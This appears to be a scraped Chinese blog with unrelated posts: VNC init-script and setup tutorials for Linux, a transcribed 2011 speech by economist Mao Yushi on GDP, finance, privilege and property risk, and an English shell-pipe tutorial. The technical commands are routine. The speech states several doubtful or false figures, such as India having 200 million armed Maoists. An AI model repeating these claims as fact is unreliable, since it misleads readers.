        for display in ${VNCSERVERS}
        do
                echo "${display}"
                DISP="${display%%:*}"
                USER="${display##*:}"
                /usr/bin/su ${USER} -c "export HOME=~${USER} && /usr/local/bin/vncserver -

kill :${DISP}" >;/dev/null 2>;&1
        done
        RETVAL=$?
        [ "$RETVAL" -eq 0 ] && rm -f /var/tmp/vncserver
        ;;
  *)
        echo $"Usage: $0 {start|stop}"
        exit 1
esac
exit 0
然后,加上执行权限,建到rc3.d和rc2.d的软链接

QUOTE:
# chmod +x vncserver
# ln -s /sbin/init.d/vncserver /sbin/rc3.d/S999vncserver
# ln -s /sbin/init.d/vncserver /sbin/rc2.d/K100vncserver
Ref:
http://www.realvnc.com/pipermail/vnc-list/2002-March/028698.html
http://docs.hp.com/zh_tw/5187-0723/ch01s01.html




VNCLinux下的远程遥控专家

作者:未知    转贴自:网络收藏    点击数:164


在 微软Windows操作系统中的远程控制工具软件非常多,其中大家最熟悉的莫过于赛门铁克公司的PC ANYWHERE,还有CA ControlIT等等。这些远程控制工具软件都可以通过网络来控制特定的计算机,可以共享那台计算机的数据资料,操作该计算机上的外部设备。
  既然在Windows下的远程控制软件如此出色,那么在Linux平台中是否有好用的一次控制工具软件呢?实际上,在Linux操作系统平台中也是存在几款功能强大的远程控制工具软件的,只是这些软件非常少,使用的用户也不是很多,所以一般的Linux用户对它们知道的并不多。
  远程控制软件最大的好处就是能通过网络访问特定的计算机。比如您在办公室里上班,想要一些放在家里计算机上的资料,如果使用了远程控制 技术,那么您就不必跑回家用软件拷贝文件了,只要通过办公室里的计算机拨号上网或者通过VNP方式就能访问您家里的计算机,输入用户名和密码,就能拷贝到 您需要的资料。当然,具体的软件设置方法在Windows下是很容易实现的,使用PC ANYWHERE等软件也可以方便的设置主机和客户端计算机。
  在Linux平台中的有些高级用户也知道通过在XFree86 下的X应用软件来远程控制计算机,不过通过这样的方式来远程访问计算机需要宽带技术支持,否则很难实现。还有,这种方式也不能跨平台使用,Linux的主机不能控制非Linux平台的计算机,也就是说Linux的主机只能控制Linux平台的计算机,不能控制Windows和Mac操作系统的计算机。这样给我们的工作会带来很大的不便。
  优秀的Linux下的远程遥控专家VNC能帮助我们实现Linux远程控制的愿望。VNC (Virtual Network Computing)是虚拟网络计算机的缩写。VNC是一款优秀的远程控制工具软件,由著名的AT&T的欧洲研究实验室开发的。VNC是在基于UNIX和Linux操作系统的免费的开放源码软件,远程控制能力强大,高效实用,其性能可以和Windows和MAC中的任何远程控制软件媲美。
  VNC基本上是由两部分组成:一部分是客户端的应用程序(vncviewer);另外一部分是服务器端的应用程序(vncserver)。VNC的基本运行原理和一些Windows下的远程控制软件很相象。VNC的服务器端应用程序在UNIX和Linux操作系统中适应性很强,图形用户界面十分友好,看上去和Windows下的软件界面也很类似。在任何安装了客户端的应用程序(vncviewer)的Linux平 台的计算机都能十分方便的和安装了服务器端的应用程序(vncserver)的计算机相互连接。另外,服务器端 (vncserver)还内建了Java Web接口,这样用户通过服务器端对其他计算机的操作就能通过Netscape显示出来了,这样的操作过程和显示方式比较直观方便。

如何获取和安装VNC
  一 .安装vnc的rpm包

  1 安装linux

  1.1 图形界面下的安装要是在KDE或者GNOME下,直接点击rpm包,系统会自动开始安装。中间还会提示你设置密码,端口等。

  1.2 命令行下的安装。

  下面还是说说命令行下的安装,其实也是非常简单的,一个命令就可以了。

  cd /mnt/f/vnc/
  rpm -ivh vnc-3.3.6-2.i386.rpm

  2 设置vnc server的访问密码

  vncpasswd 

  3 启动vnc server
  vncserver (((!!!注意 不要以ROOT用户启动该服务端!!!)))

  4 linux上的vnc server内定的管理环境是twm,不好看,也不方便。

  我们来把它改成KDE. 修改$HOME/.vnc/xstartup这个文件.把starttwm改成startkde 修改后要重新启动vnc server。


如何管理VNC
  在默认情况下,VNC使用的管理图形用户界面是twm,这个twm管理窗口我想大家一定很熟悉了,在Linux众多的图形管理窗口中,twm对系统的要求是最低的,对资源占用行对其他管理窗口要小很多,这对我们在Linux运行时启动VNC时是非常有用的。twm管理窗口的默认配置参数就存储在/home里地一个隐藏子目录.vnc当中的xstartup文件里,如果您需要对twm重新进行配置,可以在此目录中找到xstartup文件进行修改。
  尽管twm管理窗口看上去不如KDE和GNOME那样华丽,但是您在运行VNC进行远程管理的时候并不需要KDE那样复杂的图形用户环境,并且KDE占用的系统资源相对较大,并且不是很容易进行网络管理,有twm就足够了。还有一个比较好的图形用户界面就是fvwm2,这个图形用户界面占用的系统资源也比较小,也适合作为VNC图形管理环境使用。需要fvwm2的读者可以到http://www.fvwm.org下载使用。
  对VNC进行测试的工作也非常简单,首先运行VNC的服务器端,然后运行vncviewer xxx.xxx.xxx.xxx:1 ,注意,xxx.xxx.xxx. xxx就是您的计算机的IP地址或者主机名。:1指的是要启动X显示方式。如果您的Linux系 统中安装了Java classes,您可以启动NETSCAPE(当然如果您使用的是Windows操作系统,也可以运行Internet Explorer)来连接vncserver,然后输入以下URL:http://xxx. xxx.xxx.xxx:5801 ,同样,xxx.xxx.xxx.xxx是您计算机的IP地址或者主机名。
  完成以上步骤后,vncviewer Java applet会自动的载入浏览器,并且提示您输入管理员密码,这样您就可以直观的参看,管理VNC了。
  如果您想通过VNC远程控制一台Windows或者MAC平台的计算机,那么请您注意这些计算机的5800端口是否空闲,不被其他设备所占用,因为VNC必须使用5800端口和其他计算机进行连接通讯。
  其他操作系统上使用GUI界面的viewers也要特别注意,viewers需要在16位色的显示模式下工作,如果您的Windows操作系统中不能上16位色,那么请您及时的调整您计算机的显示模式。不然viewers无法正常工作。
  好了,最后要告诉大家,VNC不但可以通过Linux系统的主机来远程控制其他操作系统的计算机,更令人吃惊的是VNC还可以控制手持式的数码产品。例如使用PalmPilot 和Windows CE平台的PDA(个人数字助理)也能通过无线MODEN和Linux主机相互连接,这样您在上班的的地铁上也能轻松的通过无线PDA和家里的Linux主机相互通讯了。是在是太神奇了。
  在不久的将来,VNC还可以通过移动电话来控制其他的计算机,在即将到来的无线时代,VNC的作用将得到人们的重视,让我们为VNC喝采吧。

VNC+Gnome/KDE

By: Onlyone
30 December 2011 at 21:44

Linux vps安装图形界面的方法(VNC+Gnome/KDE)-远程桌面多方案适合大小内存

作者: CrazyFeng 日期: 2011 年 8 月 29 日发表评论 (1)查看评论




Ø 综述
在使用Linux VPS时,很多人都不习惯通过ssh命令行来管理服务器,人们更愿意通过像Windows下的远程桌面这样的图形远程程序来管理服务器,VNC+ Gnome/KDE桌面环境是一个很好的解决方案!
Ø 注意:安装图形管理界面需要256M以上内存!
有关gnome\kde面板的介绍看这
Ø 安装方法
首先ssh登陆上你的vps。
l 对于256M小内存的机器,推荐安装VNC+KDE操作界面1.安装KDE
yum install kdepim
2.安装X Window
yum groupinstall "X Window System" "KDE (K Desktop Environment) "
3.安装VNC+Firefox+中文支持
yum -y install vnc vnc-server firefox x11-xorg
yum -y install fonts-chinese
l 对于512M或以上内存的vps,推荐安装VNC+Gnome操作界面
1.安装Gnome
yum groupinstall gnome-desktop
yum install gnome-session
2.安装X Window
yum groupinstall "X Window System" "GNOME Desktop Environment"
3.安装VNC+Firefox+中文支持
yum -y install vnc vnc-server firefox x11-xorg
yum -y install fonts-chinese
Ø 安装后配置
1.运行以下命令
vncserver
运行完后会提示你设置密码,需要输两遍。设好你的密码后,然后程序会建立一个.vnc的目录,一般情况下是/root/.vnc
2.杀掉VNC的进程并删除临时sockets。
pkill -9 vnc
rm -rf /tmp/.X1*
3.编辑/root/.vnc/xstartup,
vi中按a进编辑模式,esc退出编辑模式,:wq保存后退出!
不会使用vi?请看vi常用命令
vi /root/.vnc/xstartup
|->本文来自CrazyFeng.com ,转载时请保留本信息 !~
在最后一行是twm &这样子的。
如果你安装的是KDE,则将twm改成startkde
如果你安装的是GNOME,则将twm改成gnome-session (如图所示)crazyfeng
4.重新开启vncserver
vncserver
好了,大功告成!!
Ø 另有省内存的linux图形桌面方案,参照自
http://icodex.org/2010/03/centos%E6%9C%80%E5%B0%8F%E5%8C%96%E5%AE%89%E8%A3%85gnome%E5%92%8Cvnc/
采用tightvncserver作为VNC服务端,比较省内存,另也可以在安装有java运行环境的浏览器直接远程打开VNC客户端连接.当然你也可以继续用通常的VNC连接方式连接登录.
Ø 安装教程
1.安装x-window桌面和KDE或Gnome环境
yum groupinstall "X Window System" "KDE (K Desktop Environment) "
yum groupinstall "X Window System" "GNOME Desktop Environment"
KDE较Gnome更省内存!!
2.添加中文支持和浏览器
yum -y install fonts-chinese firefox
3.安装tightvnc.
(CentOS 5 64Bit)
wget http://packages.sw.be/tightvnc/tightvnc-server-1.3.9-3.el5.rf.x86_64.rpm
rpm -ivh tightvnc-server-1.3.9-3.el5.rf.x86_64.rpm --force --nodeps
(CentOS 5 32Bit)
wget http://packages.sw.be/tightvnc/tightvnc-server-1.3.9-3.el5.rf.i386.rpm
rpm -ivh tightvnc-server-1.3.9-3.el5.rf.i386.rpm --force --nodeps
如果上面的源失效,推荐一个rpm搜索网站
http://rpm.pbone.net/
Ø 补充:必须做以下操作,否则会因找不到字体路径而无法启动!
mkdir -p /usr/X11R6/lib/X11
ln -s /usr/share/X11/fonts /usr/X11R6/lib/X11/fonts
使用方法(以会话ID:1为例)
启动vnc.执行命令:
vncserver :1 -httpport 9001 -name icodex_desktop -depth 24 -geometry 1024x768
PS:如果你不需要http管理,运行执行vncserver即可!
关闭vnc,执行命令:
vncserver -kill :1

茅于轼:2012年中国经济最大的风险还是在房地产

By: Onlyone
30 December 2011 at 09:57
 
首先感谢中国有色峰会对我的邀请,今天我将用一个经济学家的眼光看待当前的经济形势。所有的经济问题中最 重要的问题是什么?由于时间关系,我要省去很多内容。首先讲讲经济问题中最重要的是什么问题,我认为还是GDP问题,GDP就是国内生产总值,就是全国人 民一年生产的财富总值,这个财富包括我们所有用交换得到的享受,不管你这个交换是拿来买粮食吃还是理发、旅游,都是一样的,它是用钱来表示的。
  用什么钱来表示呢?价格,什么价格呢?均衡价格,什么叫做均衡价格呢?就是以这个价格你一定能够买得到,而且如果你有一个货,按照这个价格一定 能卖得掉。能买得到,能卖得掉的价格就是均衡价格。在座的诸位做有色金属的买卖,你们赚的钱是不是GDP呢?是GDP,但是按照老的政治经济学的说法,你 们赚的钱不是财富的创造,你们是从生产劳动中分了一点钱,所谓生产劳动是有色金属的开采、演练、他们创造的财富。你们做买卖的从他们创造的财富里分到了一 点。因此一个国家要财富增加,不是去做买卖,而是去开采冶炼。这个看法是错误的,为什么错误呢?因为你们赚了钱可以买一些东西,超市里好几千种商品都能 买。你们赚的钱和做开采冶炼赚的钱是一样的,所以一样的钱,没有区别,所以你们赚的钱就是财富的创造。这一条特别重要,就是一个经济存的钱可以买到一切东 西,这个事儿好象不奇怪,但确实是一个经济学里最基本的问题。
  你为什么能拿钱来买东西呢?诸位提供给社会的服务是有色金属的买卖,你提供信息、规避风险,在这方面你提供了服务。这种服务跟生产劳动的服务有 没有区别呢?没有区别,在财富量上讲是没有区别的。就是你提供的服务为什么可以用来购买面包呢?如果你是个做面包的,你自己生产面包,自己吃面包,知道自 己能吃多少就生产多少。但是你提供的是有色金属的买卖,你为什么能吃面包呢?这里最重要的奥妙就是有一个市场,这个市场保证一切商品的供给,用什么办法保 证?非常简单,供不应求或供过于求,一切商品,包括我们的有色金属,如果供过于求就会倒掉。因此在这个市场永远买得到,也永远卖得掉。
  你在超市可以买到好几千种商品,包不包括粮食?当然包括粮食,因此粮食的安全、粮食的供给靠什么?靠市场,市场是什么?供不应求涨价、供过于求 降价,所以你在超市可以买到粮食,有人不放心,说超市能买到粮食了,必须要有耕地的保障,要有18亿亩耕地,没有了耕地,你怎么买得到粮食呢?所以他认为 你在超市可以买到粮食的原因是因为国家设了18亿亩耕地的红线,不许减少,所以你能买得到粮食。这个看法对不对呢?你在超市可以买到刷牙的牙膏,你买牙膏 靠什么红线呢?超市有好几千种商品吧?是不是每种商品都有一条红线呢?不对,没有那么多红线,只有一条线:供不应求涨价、供过于求降价。因此,只要有市场 就不可能有什么粮食危机,什么能源危机,什么水危机都不可能发生。只有金融危机是真的危机,因为金融危机把这个市场给破坏了,我们在50年代末发生了大饥 荒,那时的3000多万人为什么饿死?没有市场,不是没有耕地,也不是没有劳动。北朝鲜为什么那么多人饿死?没有市场,破坏市场,大祸来临。这一条太重要 了,国际市场、国内市场是绝对不能破坏的,破坏了国际市场以后灾难就来临了,全世界的金融学家要懂得保护市场,很可惜,现在做不到,他们不见得懂得这个, 他们保护的是别人的,如果你保护的是别人的,侵犯了市场,灾难就来临了,大难就来临了。
  那么财富是怎么创造的呢?财富当然要有物,要有东西,要有粮食,要有矿等等,但是财富创造的根本渠道是通过交换。GDP是怎么来的?就是交换出 来的,统计局怎么算GDP?他们是把交换计入到GDP里面去。而且我们说的GDP是指用掉的东西,生产出来的东西不是GDP,要用掉,把它花掉了,这才是 GDP。一个东西生产出来放在货架上,那不是GDP,把货架上的东西卖掉才是GDP。所以严格来讲,把GDP叫做国内生产总值不是太恰当,它不光是生产, 更重要的是把它用掉。
  我举一个例子说明诸位做有色金属交易赚的钱不是靠冶炼和开采,我举这样一个例子:一个农民生产了100斤小麦,他拿这些小麦要磨成面粉才能吃, 拿到磨坊去,请磨坊的老板磨成面粉,他拿了10斤小麦给磨坊,背回去90斤面粉,现在我问大家,磨坊得到的10斤小麦是磨坊创造的还是农民创造的?磨坊有 没有创造财富?如果他们创造了财富,那么这10斤小麦是不是他创造的呢?你说他创造了财富,10斤小麦明明是农民生产的,他没有生产出小麦来,于是他没创 造财富,但他把小麦变成面粉了,给社会服务了,你怎么说他没创造呢?这个问题就使得经济学家想不通,大概有100年也没有找到解决的办法。一直到马克思以 后才得到了一个正确的回答:这10斤小麦,从东西来看,从“物”来看确实是农民创造的,但是从财富来看,从价值来看是磨坊老板创造的。怎么证明呢?农民拿 回去的90斤面粉,它的价值比100斤小麦的价值高。他没有损失财富,他还得到了财富,从100斤小麦的财富变成90斤面粉的财富,90斤面粉的财富比 100斤小麦要高,他没有损失什么。所以模仿得到的10斤小麦是他创造的,不是农民损失的。这个例子跟我们做有色金属交易是一样的,我们做交易赚的钱不是 靠有色金属的开采和冶炼,是我们自己创造的财富。我们赚的钱跟任何一个行业赚的钱一模一样,都可以买东西。所以中国改革30年,财富极大地增加,其原因就 是大家都赚钱,而不是大家都不去种小麦,都去开采冶炼,是大家都赚钱,钱多了。现在中国什么多?钱多,钱多是什么意思?你买什么都行,什么东西都多。过去 我们老是讲生产劳动,不讲劳动的价值,所以就很穷,现在我们换了理论,不用那种过时的理论了。
  我们希望GDP越高越好,现在GDP提高的障碍在什么地方?不是生产不出来,而是用不掉,买得少。所以现在我们叫做需求不足,叫做生产能力过 剩,生产的能力很强,但是货架上的东西卖不掉。你卖不掉又不能订货,不能订货工厂就不能开工,生产就没有了。所以生产的多少现在取决于消费,取决于用掉, 过去的情况是卖方市场,买得很多,生产不出来,现在是相反,全世界大多数国家大多数时间都是需求不足,都是买得不够,不是产不出来。我们的GDP拿来干什 么用呢?三个用场:一是消费,我们吃的,穿的,用的,玩的都是GDP;二是投资,比如盖一座大楼,修一条地铁,这不是消费,这是投资,我们生产的GDP被 拿来投资了;三是出口,现在我们拿来消费的占多少呢?占47%。投资占到多少?占到49%,出口占4%,消费占47%,投资占49%,这两个加起来是 96%,还有一个4%是出口了。我们消费的47%当中老百姓消费的是34%,政府消费的是13%。所以大家想想看,我们大家辛苦了一年,创造了多少财富 呢?拿去年来讲,40万亿元人民币,其中我们享受的,我们吃的穿的玩的、美容理发上学医疗一共是多少?1/3,34%。这个数字是非常偏低的,我们创造的 财富只享受了1/3,那2/3跑哪儿去了?政府消费了13%。政府的办公用品、出差、公车消费,不包括政府建大楼,政府建的大楼是属于投资。出口的4%不 算多,但是我们每年都有一定数额的出口,因此积累起来现在变成了天文数字。现在我们出口在外的东西有多少钱?20万亿。我们一年生产40万亿,现在出口在 国外剩下的钱是20万亿,也就是外汇储备,我们的外汇储备是3万多亿美元,相当于20万亿人民币。所以今后我们国家的结构调整要大大提高居民消费,像美国 的居民消费差不多要占到70%,而我们只有30%,连他们的一半都不到。他们生产出来的财富大部分是自己享受掉了,我们生产出来的财富只享受了1/3.
  我讲讲现在的状况跟改革开放开始的时候相比,人口从9亿增加到了13亿,增加了38%,但是小学生的人数从1.5亿减少到了1个亿,他们长大了 就是劳动力。人口增加了这么多,小学生还减少了1/3,这是中国面临的人口大问题。进城打工的农民原来是吃不饱饭的,农村有很多人吃不饱饭,进城打工能吃 饱饭,一个月还能拿到几百块钱,他非常满意,再苦再累的活他都肯干,现在不一样了,现在进城打工的人可以得到好的教育,信息非常通畅,国内的事儿国内的事 儿他们都知道,因为他们会上网了,不一样了。现在一个人一个月的收入相当于30年前一年的收入,就拿买粮食来讲,现在一个人一个月的收入差不多可以买一年 的粮食。政府有老干部打天下、坐天下,现在这些人变了,原来那批人没有了,现在都是硕士、博士和留学回国的知识精英。本来是无产者,现在变成有产者了,我 们让他们登记他们的财产他们还不太愿意。早先移民想到外国去多挣点钱,现在移民不是了,到外国是求安全,因为财产、人身比较安全。从前的国企赔钱,赔得财 政负担不起,都被卖掉,现在国企赚钱赚得不得了,但是国企赚钱不是靠他们降低成本,主要是靠他们的垄断位置。社会民间也不同,老百姓过去要求的是平反,现 在要求的是维权。政府也不一样了,政府那个时候要求拨乱反正、改革开放,现在是维稳。中央集权、领导集权的形势不一样了,我们可以很清楚地看到温家宝和吴 邦国他们两个意见不一样,他们说的话不一样,这些都是党内的领导结构和30年前非常不一样了。
  这就涉及到虚拟经济和实体经济,中央经济工作提出“要发展实体经济创造财富”,我觉得这个话有问题,他们不承认实体经济和虚拟经济是相关的,诸 位赚的钱都不是实体经济,由于中央的这个看法的片面性,中国就变成了一个制造大国,我们是全世界的制造中心,什么衣服、玩具、电子产品在全世界的超级市场 都可以看到中国的产品,我们是制造中心,但是我们这个钱挣得很苦啊,人家没有搞制造中心却赚了很多钱,什么原因?他们就是虚拟经济赚的钱,各位做的都是虚 拟经济,特别是金融业,我们不懂得金融业是创造财富的,因为金融业就是把数字搞来搞去,这没有财富创造,但是人家金融业赚了好大的钱,他们赚的钱是财富创 造吗?当然是,如果不是的话,他们怎么用这些钱买东西啊?财富跟物是两回事,刚才我举的例子已经说明,农民种了100斤小麦,这是劳动生产的小麦,没有 错,但是把这些小麦变成面粉,它的价值提高了,重量却减少了,我们要的是价格,不是重量。我再举一个例子,我们知道广东出香蕉,上海出不了香蕉,但是我们 上海人也要吃香蕉,所以香蕉在广东吃掉和在上海吃掉是不一样的。同样的香蕉,你拿到上海、拿到北京来吃比在广东吃掉的价值要高。香蕉还是那个香蕉,拿到北 京,拿到上海就不一样了,这叫做物尽其用、人尽其才。一个社会怎么发财,怎么创造财富?人尽其才,物尽其用。不光是要有物,更重要的是物要尽其用。换句话 说,物可以不尽其用,可以把它用错、用浪费了,经济学研究的是什么?就是研究资源配置,什么意思呢?就是物尽其用,人尽其才。同样的物,我们把它用好了。 过去计划经济就知道要生产物,却不知道这个物生产出来怎么用。人也不能够尽其才,我们的知识分子被赶到农村种地,种了十年地,我在农村呆了十年,你怎么能 让我尽其才呢?在座的各位没有去种过地,老农种地有长处,你们种地肯定不行。所以财富的创造靠人尽其才、物尽其用。
  那么经营业怎么创造财富?经营业就是钱尽其用。钱可以用好,也可以用坏,看你怎么用,把钱用到最有效的地方去,最需要钱的地方去,你把钱给他 用,这个金融业就非常好。你把钱借给那些不太需要的,并且赔钱的项目,你把钱给了他。那个非常赚钱的项目得不到钱,这个金融业就是很糟糕的金融业。利息率 就表示一个钱的生产率,所以钱要给谁来用呢?给能出得起高利息的人用,利息越高说明生产钱的能力越高。因此就要发展高利贷,什么道理呢?高利贷,利息的最 高,说明能够钱尽其用。你把钱给高利贷的人,钱就发挥作用了。你不给他,给那个低利贷的,你的钱就没尽其用了。所以我说要为高利贷平反。但是我也不赞成利 息率很高,因为这确实是一种剥削,你享受了现在的高利贷50%,100万一年就可以拿50万的利息,这个太霸道、太不合理了。尽管他钱尽其用了,但是从另 一个角度来看不合理。那怎么解决这个问题呢?解决的办法很简单,为什么利息率高?因为很难借到钱,利息率就高了,很容易借到钱,利息率就上来了,怎么叫做 容易借到钱?就是增加供给,任何东西都一样,供给增加了,价格就下来了。为什么高利贷少?愿意放高利贷的人少,政府禁止高利贷,不让它有,因此高利贷很 少,要借钱就很困难了。所以解决高利贷的办法是大都放高利贷,高利贷就没有了,利息率就上来了。美国为什么没有高利贷?因为大家都在放高利贷。各位都出去 放高利贷,高利贷的利息肯定会下来,而且放高利贷也好、在银行拿利息也好,这是财富的创造,这不是财富的转移,不是把别人的钱转移到你这里,你是创造财富 的。
  财富是怎么生产出来的?财富就是通过交换生产出来的。中国参加世界贸易组织,这个交换扩大到了全世界。其结果是什么?全世界因为中国参加世贸组 织都变富了,什么原因?我给大家说个很简单的道理,全世界有70亿人口,要吃25亿吨粮食。每年还增加1个亿,每年人口差不多增加1个亿。这1个亿的人口 生出来之后要吃粮食吧?这个粮食请谁去生产呢?是中国生产?还是由美国、苏联生产?应该在一个生产成本最低的地方生产,各个国家生产成本是不一样的,因为 自然条件不一样。你怎么知道什么地方生产成本最低呢?通过贸易就知道了,凡是价格低的地方成本就低。因此价格低的地方粮食应该多生产,出口到成本高的地方 去。这就是一个例子,怎么使得全世界的财富增加,降低你的生产成本?怎么才能降低呢?拿粮食作例子,粮食生产成本低的地方多生产。我们做有色金属也一样, 中国是有色金属的一个出口大国,如果中国不出口有色金属,当然,我们有进口的,比如铜都是进口的,但稀土是我们大量出口的。如果我们不入口,让那些国家去 生产稀土,他们的成本就非常高,中国生产稀土的成本就很低,因此中国生产稀土并出口,它们的价格就下降了,财富就是这样创造出来的。所以中国入世十年,全 世界得到中国的好处非常非常地大。刚才我说过,全世界的超市里差不多都能看见中国的产品,他们都享受了很便宜的、质量也不错的中国的产品,买到便宜东西 了,那就是财富创造嘛。所以交换创造财富,不是等价交换。柯林斯说的等价交换是错的,等价干吗要交换啊?价格不一样才会交换嘛,因为你的东西贵,我出口给 你我就赚钱了,因为我这儿的东西便宜。但是这里涉及到一个汇率的问题,就是你生产的成本要用到汇率,我们人民币的汇率压得很低,看起来我们干什么都是成本 低的,因为有大量的出口,人家大量出口有他的好处,就是他们买到了便宜的商品,但是也有一个坏处,他们的消费都是在中国生产,在国内生产得少了,国内的就 业就会发生问题,国内的就业非常困难。当前美国跟中国主要的矛盾就是就业的矛盾。
  金融业扩大了收入,但是配置却不公平,因为金融业是用别人的钱来赚钱的。证监会、银监会、保监会都一样,银行用别人的钱来赚钱,我们大家的存款 存在银行,他们用大家的钱去赚钱。证监会我们买股票把钱给了企业,他们用我们的钱去赚钱。保监会用客户的钱,因为他们用别人的钱,所以要有监督,要有证监 会、银监会、保监会。其它的行业不需要监督,我用自己的钱,你们干吗监督啊?而且金融业用小钱赚大钱,它的利润是非常高的。各位如果买基金就知道了,亏的 话都是你的,赚的跟你分。因此就扩大了贫富差距,拿钱赚钱,穷人没有钱,沾不到光,钱多的人就会更多,扩大了贫富差距。华尔街觉得这么赚钱很不公平,但是 有没有解决的办法呢?我想不出来什么解决办法。所以这就会产生公平和效益的矛盾。市场能够有效地生产出财富来,但是产生了收入分配的差距。为了实现公平有 各种方法,有的是用革命的办法,把有钱的人的钱没收掉,也有收税的办法,还有做慈善的办法,在民间做慈善也是一种方法,但是公平和效益总归是矛盾的。中国 的生产能力非常强,全世界第一,为什么?大家都忙着赚钱。如果没有不公平,如果是全国人民吃大锅饭那就没有生产能力。你们信不信?假定从下个月开始,中央 政府决定每个人一个月拿三千块,不管你干什么都一样。中国的生产力马上降低,过一年中国就要出大问题。不光中国这样,美国也一样,美国的生产能力很强,你 让他们吃大锅饭,他们马上就完蛋,可见公平是不能绝对公平的,绝对公平要出大事儿。我们试验过,特别是让农民吃大锅饭他们就不想干了,他们就怠工了,粮食 就产不出来,全国人民都挨饿。后来改成家庭承包包产到户,马上不就解决问题了?好几十年吃不饱,一下子就吃饱了,现在都吃得营养过剩了,肥胖病,这就是改 革了吃大锅饭,吃大锅饭是不行的,必须要有差距。我们要承认,差距是合理的,但是太大的差距是不合理的,要缩小差距。但是缩小到什么算好呢?这个事儿很难 说,反正是得有差距,不能没有差距。
  革命永远是对的,马克思、恩格斯、查韦斯、卡斯特罗都有大量的追随者,但他们指的是全社会更穷,没有办法使大家变富。大家可能不知道,印度有 10亿人口,有2亿“毛派”,走毛泽东路线,这2亿毛派已经几十年了,他们就是穷,所以总是有人支持,有人相信毛泽东,但他们就是穷,几十年解决不了。他 们不只是一个政党,他们也有武装的,印度政府派兵去打都打不过。印度的“毛派”是全世界最大的,有2亿人,别的国家只有几千万人口,印度有2亿人,这是不 得了的数字啊,他们老是穷,所以老是追求公平,老是摆脱不了。
  刚才我讲过,收入分配要有差距,我们真正的问题是什么?是特权问题。我们的要就业率,只注重收入的分配,不注重权力的分配,很少人关注权力的分 配。我们在1919年“五四运动”时提出了民主和科学,1966年联合国提出了人权,人权比民主和科学的口号更重要,没有民权的民主和科学是口碑的。我们 把民主看作少数服从多数,如果没有人权,少数服从多数是非常可怕的。,你的生命、财产都没有保障了。有人说你是个反动派,就把你给抓了,给打了,财产给没 收了,没有人权。所以说反特权比人权的口号又近了一步。所以我觉得中国的问题是人权的问题,不是收入差距,但问题的根不在于收入分配上,在权力的分配上, 在特权上。收入差距可以看得见,特权是看不见的,其实特权是问题的根本。什么叫特权?法律管不住他,他不守法你没办法,各地都有人可以不遵守交通规则,我 相信全国各地都有,上海也有,北京是最典型的,我就住在钓鱼台旁边,每天都有特权者来来去去,他一来就交通管制,别人都不能走,就他能走,你凭什么就可以 违反交通规则?国家垄断行业金融业、石油,连煤矿都想垄断,财经、通讯,3.3万亿美元的外汇,大家知道,我们在外国有3.3万亿的外汇储备,你们在座的 诸位能用这个钱吗?那是中国人的钱,但是你们没法用它。特权的人可以用,我们老百姓不能用,很可悲啊。几千年就是个特权社会,皇帝的特权最多,一品官也有 特权,一直到九品芝麻官都有特权,老百姓就没有人权了。解放后没有解决特权的问题,反而加剧了特权。领导人是不受法律制约的,你不要说中央政治局委员,就 是一个省长、一个市长都不受法律制裁。我们说“双规”是什么意思?这个领导同志有了问题,让他在规定的时间、地点交代问题。也就是说这个人有了问题,法律 不能治他,等到“双规”说这个人有了问题,移交法院审判,这个时候法院起作用了,在此之前法院是不起作用的。所以你只要当上共产党的领导干部,你就进了保 险箱了,检察院不能起诉你,要“双规”之后才能起诉你,你只要不被“双规”,在保险箱里呆着就没事。所以解决人权不平等才是当务之急。
  前面我讲过,粮食也好、能源也好,水也好,都没有危机,只要有市场,关键在于市场。所谓的市场就是价格是自由的、是浮动的,供不应求会涨价,涨 价以后供比增加了,需求减少了,就不会供不应求了。可能能源价格很贵,1桶石油100多美元,但这是因为缺才贵,如果东西很缺又不贵,被人随便用,那就很 糟糕了。所以一个市场的好处就是能够把稀缺性通过价格告诉全社会,现在什么东西缺,价格很高,大家省着点儿用,这正好就是一个市场的功能。所以所谓的粮食 危机、石油危机就是价格贵了,价格贵是应该的嘛,他们东西缺了,当然应该贵了。真正的危机是金融危机,它破坏了市场,一旦市场停止工作,危机就真的要发生 了。
  那么我们说中国明年的情况是怎样的?我觉得最大的风险还是在于房地产,房地产的风险非常非常大。全国各个大中城市空房都非常多,我看上海的空房 也不少。空房多就是危险,这些房子并不是真正地被需要,空在那儿了,不住人了,它们是用来投机的。大家知道,投机赚钱是真正财富的创造,但是变成泡沫就不 一样了,泡沫不是财富创造,它具有极大的破坏性的风险。
  最后我谈谈中国的未来,我们需要的是什么?经济上进一步私有化,中国改革成功首先不是公有制,而是私有化。我们从百分之百的公有制,现在有一半 多的私有制,要使中国经济继续发展还要进一步地私有化。全世界没有一个国家靠着公有制能够成功的,成功的国家都是私有制,中国不可能例外,中国还是要靠私 有制来成功。当然,私有制不等于就没有公有的企业,公有企业是可以有一些,但是很少。像美国就干脆没有,美国没有公有企业的,他们最大的公有企业就是邮政 局,美国邮政局是公有的,但是美国的邮政局是很糟糕的,美国的老百姓非常反感,想了很多办法,到现在还没有解决问题,还是公有的。其它的美国国防、武器生 产都是私有的,我们认为也是不可想象的,美国关犯人的监狱都是私有化的,美国有50个州,有33个州的监狱都是私有化的,监狱包给一个人去干,伙食、卫 生、安全政府都不管的,政府给你钱,给它外包了。美国是最典型的,法国和新加坡有很多的国有企业,但肯定是以私有企业为主,不是以公有制为主。要改善政府 对企业的服务,从管理型变成服务型,要取消各种价格的控制,取消限购,不能有限购,人民币要国际化,要符合WTO的要求,进一步开放,在政治上要还政于 民,让人民的权利得到保障,严格尊重人权,取消特权,保护对外开放,流入世界大潮。这就是我今天的发言,谢谢大家!  
  (在“中国有色金属峰会暨上海有色网2011年会”上的讲话,原载于东方财富网

Linux 学习笔记(1): Linux Shell Powerful Tools

By: Onlyone
15 December 2011 at 17:46
Linux Shell Powerful Tools


Connecting and expanding commands
A truly powerful feature of the shell is the capability to redirect the input and output of commands to and from other commands and files. To allow commands to be strung together,the shell uses metacharacters. As noted earlier, a metacharacter is a typed character that has special meaning to the shell for connecting commands or requesting expansion.

Piping commands


The pipe (|) metacharacter connects the output from one command to the input of another command. This lets you have one command work on some data, and then have the next command deal with the results. Here is an example of a command line that includes pipes:


$ cat /etc/passwd | sort | cut -f1,5 -d: | less


This command lists the contents of the /etc/passwd file and pipes the output to the sort command. The sort command takes the user names that begin each line of the /etc/passwd file, sorts them alphabetically, and pipes the output to the cut command. The cut command takes fields 1 and 5, with the fields delimited by a colon (:), then pipes the output to the less command. The less command displays the output one page at a time, so that you can go through page by page.


Using file-matching metacharacters
